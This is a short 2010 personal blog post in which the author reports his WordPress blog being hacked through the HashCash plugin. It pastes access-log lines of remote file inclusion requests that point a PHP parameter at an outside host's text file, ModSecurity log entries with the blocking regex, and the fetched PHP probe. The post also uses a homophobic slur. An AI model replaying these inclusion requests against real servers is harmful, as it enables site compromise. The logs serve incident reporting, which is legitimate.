Blog was hacked

Posted 2010-01-05 | archive

My blog was hacked by some fag from somewhere due to an exploit in Wordpress plugin HashCash.

The server load surged to 300 and I have to disable Wordpress temporarily and re-install 2.9.1

77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash
/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? 
HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives/242//components
/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////
zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives//components/com
_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxi
d1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"



[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
 denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
 dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
  REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
  ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
  eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
  tname "blog.est.im"] [uri "/components/com_hashcash/server.php"] [unique_id
   "S0MqF0Wji1IAAEzEq5kAAAAK"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
 denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
 dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
  REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
  ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
  eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
  tname "blog.est.im"] [uri "/archives/242//components/com_hashcash/server.ph
  p"] [unique_id "S0MqF0Wji1IAAEpmXZcAAAAJ"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
 denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
 dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
  REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
  ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
  eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
  tname "blog.est.im"] [uri "/archives//components/com_hashcash/server.php"] 
  [unique_id "S0MqF0Wji1IAAEmWRFIAAAAI"]

http://photoworld.com.ua////zfxid1.txt

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

When upgrading Wordpress 2.9.1 I lost some of my modification to Wordpress, and I have to type them letter by letter again in a slow SSH terminal. Fuck!

Comments